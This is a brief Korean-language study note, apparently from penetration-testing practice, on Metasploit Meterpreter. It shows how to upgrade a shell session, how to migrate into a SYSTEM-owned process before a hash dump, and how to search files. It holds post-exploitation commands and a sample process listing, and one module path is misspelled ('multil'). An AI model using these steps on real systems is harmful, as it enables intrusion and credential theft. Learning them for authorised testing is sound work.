Meterpreter

미터프리터 전환 방법 두가지
- 백그라운드 전환 후 (컨트롤+z)
첫번째, sessions -u 1
두번째, use post/multil/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit

참고: https://www.hackingarticles.in/command-shell-to-meterpreter/
we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. 

 

 

Exploit 후 프로세스 migrate하기

- 해쉬덤프전 수행해야하는 단계

우리가 시스템 수준의 특권을 가지고 있다고 해서 우리의 프로세스가 그렇게 한다는 것을 의미하지는 않는다!

이러한 권한이 있는 새 프로세스(NT AUTHORITY\SYSTEM)로 마이그레이션해야 함

 

meterpreter > ps

PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 432   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 468   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 548   708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 564   556   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 580

'ps' 명령을 통해 실행 중인 모든 프로세스를 나열하십시오. 

NT Authority\SYSTEM에서 실행 중인 이 목록 하단에 대한 프로세스를 찾으세요.
'migrate PROCESS_ID' 명령을 사용하여 이 프로세스로 마이그레이션하십시오. 

여기서 좋은 후보자들은 파워셸과 cmd 또는 이 시스템에서 실행되었을 수 있는 단어와 같은 프로그램들이다.

여기서 프로세스 ID는 방금 이전 단계에서 기록한 것과 동일합니다. 이 작업은 몇 번의 시도가 필요할 수 있으며, 마이그레이션 프로세스는 매우 안정적이지 않다. 이 작업이 실패하면 변환 프로세스를 다시 실행하거나 시스템을 재부팅한 후 다시 시작해야 할 수 있다. 이런 경우 다음 번에는 다른 프로세스를 시도하십시오.

 

 

미터프리터에서 파일검색
search -f *.txt